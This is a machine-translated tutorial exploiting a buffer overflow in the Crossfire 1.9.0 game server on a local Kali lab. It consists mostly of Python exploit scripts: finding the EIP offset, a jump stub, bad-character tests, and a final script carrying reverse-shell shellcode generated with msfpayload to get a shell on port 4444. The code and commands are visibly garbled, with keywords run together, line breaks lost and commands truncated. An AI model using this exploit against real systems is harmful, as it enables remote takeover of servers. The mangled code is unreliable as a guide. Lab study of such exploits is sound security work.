Simple buffer overflow under Linux

What is a buffer overflow?

Trained, or learned the Assembly should know that when the buffer boundary limit is not strict, because the variable passed into the malformed data or program run error, causing the buffer to "burst", thus covering the adjacent memory area of the data

Successful modification of memory data can result in process hijacking, executing malicious code, gaining control of the server, etc.

Crossfire

• Multiplayer Online RPG game
• Buffer Overflow vulnerability when 1.9.0 version accepts inbound socket connections (server side)

Debugging Tools

• Edb

Operating Platform

• Kali 2.0 x64 Virtual machine

Memory protection mechanism in Linux

• Dep
• ASLR
• Stack cookies
• Stack smash

The vulnerability is too old to avoid the test in which our VMS are hijacked and can be set through the Iptables destination port only allowing local access if the network is only host can omit

127.0.0.1-127.0.  0.1-j DROP  

Create the/usr/games/directory and extract the crossfire1.9.0 server to the directory

#解压 Touch /usr/games//usr/games/tar zxpf Crossfire. Tar . GZ

Run the crossfire to see if there is a problem./crossfire

Waiting for connections appears, there is a problem to see error

--run/usr/games/crossfire/bin/crossfire

The lower right corner is the paused paused state

Menu bar Debug + Run (F9) Click Two back to run up

You can view the program port information by command

-pantu | grep 13327

The address of the next instruction is stored in the EIP

This program is different from the general overflow, it must send a fixed amount of data before overflow can occur, rather than a certain amount of data can be, we construct the following Python program test

#!/usr/bin/pythonImportSockethost="127.0.0.1"Crash="\x41"* 4379## \x41 is a 16-input uppercase aBuffer ="\x11 (Setup Sound"+ Crash +"\x90\x00#"   ## \x90 is null,\x00 is a null characters =Socket.socket (Socket.af_inet,socket. SOCK_STREAM)Print "[*]sending Evil buffer ..."S.connect (Host,13327)) Data= S.RECV (1024)Printdatas.send (buffer) s.close ()Print "[*]payload sent!"

After running, EDB error is as follows

This means that the EIP (the address where the command is stored) has been overwritten with the address in boldface, and the computer cannot find the address. This address is the one we entered, indicating that the EIP is controllable and there is overflow.

Here you can also test the addition of a or reduce a send, you will find that the back of the two values are not a, are not controllable, that is, the data amount is only 4379 when the EIP is fully controllable

To see exactly which location A is the EIP address after overflow, the tool generates a unique string

cd/usr/share/metasploit-framework/tools/exploit/. 4379

Copy down and construct the following Python script

#!/usr/bin/pythonImportSockethost="127.0.0.1"Crash="Unique String"Buffer="\x11 (Setup Sound"+ Crash +"\x90\x00#"s=Socket.socket (Socket.af_inet,socket. SOCK_STREAM)Print "[*]sending Evil buffer ..."S.connect (Host,13327)) Data= S.RECV (1024)Printdatas.send (buffer) s.close ()Print "[*]payload sent!"

Open the EDB launcher and run the Python program

Using the tool to confirm the position of the string

cd/usr/share/metasploit-framework/tools/exploit/. 46367046

This means that the EIP address has 4,368 characters in front of it. The location of the 4369,4370,4371,4372 is the EIP address after overflow

We construct the following Python script validation

#!/usr/bin/pythonImportSockethost="127.0.0.1"Crash='A'*4368 +'B'+'C'*7 # # 4,379 charactersBuffer="\x11 (Setup Sound"+ Crash +"\x90\x00#"s=Socket.socket (Socket.af_inet,socket. SOCK_STREAM)Print "[*]sending Evil buffer ..."S.connect (Host,13327)) Data= S.RECV (1024)Printdatas.send (buffer) s.close ()Print "[*]payload sent!"

You can see that the EIP address is filled with the exact B character.

Right-click ESP, select Follow in Dump to view the data

Because it must be an exact character to overflow, the ESP register can only hold 7 characters and obviously cannot be stored shellcode

After a few registers are viewed, EAX is selected. Because EAX storage is the thousands of a that we sent previously, is controllable, and has enough size to store shellcode

The idea is to let the EIP store eax address, and then add 12 to the address, directly from the position of the first a to start execution. But each machine's EAX address is also different, does not have the universality, therefore direct jumps the idea to abandon.

Since ESP can hold 7 characters, think of jump eax and offset 12

Construct the following Python code to run

#!/usr/bin/pythonImportSockethost="127.0.0.1"Crash='A'*4368 +'B'+'\x83\xc0\x0c\xff\xe0\x90\x90'Buffer="\x11 (Setup Sound"+ Crash +"\x90\x00#"s=Socket.socket (Socket.af_inet,socket. SOCK_STREAM)Print "[*]sending Evil buffer ..."S.connect (Host,13327)) Data= S.RECV (1024)Printdatas.send (buffer) s.close ()Print "[*]payload sent!"

First the EIP address is still accurate four B

ESP = follow in Dump view

C0 0c FF E0 90 90 Description It is also perfectly written here

The idea is the EIP + ESP = eax,eax store Shellcode, because the ESP address is not fixed, you need to use a fixed address to jump

Open EDB, menu bar Plugins = Opcodesearcher = Opcodesearch

Choose the Crossfire program, ESP----EIP, choose the address of a jmp ESP, this address will not change

menu Bar plugin = Breakpointmanager + Breakpoints Select Add to add a breakpoint for the address selected above to test.

Then we test the bad character, after the bad character is tested \x00\x0a\x0d\x20

Generate Shellcode and filter bad characters

cd/usr/share/framework2/. /msfpayload-L                        #可以生成的shellcode的种类. /msfpayload linux_ia32_reverse lhost=127.0. 0.1 lport=4444"\x00\x0a\x0d\x20"

Build a Python script

#!/usr/bin/pythonImportSockethost="127.0.0.1"Shellcode= ("\xbb\x6d\x65\x9b\xcd\xdb\xdd\xd9\x74\x24\xf4\x5f\x2b\xc9"+"\xb1\x14\x83\xc7\x04\x31\x5f\x10\x03\x5f\x10\x8f\x90\xaa"+"\X16\XB8\XB8\X9E\XEB\X15\X55\X23\X65\X78\X19\X45\XB8\XFA"+"\x01\xd4\x10\x92\xb7\xe8\x85\x3e\xd2\xf8\xf4\xee\xab\x18"+"\x9c\x68\xf4\x17\xe1\xfd\x45\xac\x51\xf9\xf5\xca\x58\x81"+"\xb5\xa2\x05\x4c\xb9\x50\x90\x24\x85\x0e\xee\x38\xb0\xd7"+"\x08\x50\x6c\x07\x9a\xc8\x1a\x78\x3e\x61\xb5\x0f\x5d\x21"+"\x1a\x99\x43\x71\x97\x54\x03") Crash= Shellcode +"A"* (4368-105) +"\x97\x45\x13\x08"+"\x83\xc0\x0c\xff\xe0\x90\x90"Buffer="\x11 (Setup Sound"+crash+"\x90\x90#)"s=Socket.socket (Socket.af_inet,socket. SOCK_STREAM)Print "[*]sending Evil buffer ..."S.connect (Host,13327)) Data= S.RECV (1024)Printdatas.send (buffer) s.close ()Print "[*]payload sent!"

Listen to the local 4444 port to get a shell

Simple buffer overflow under Linux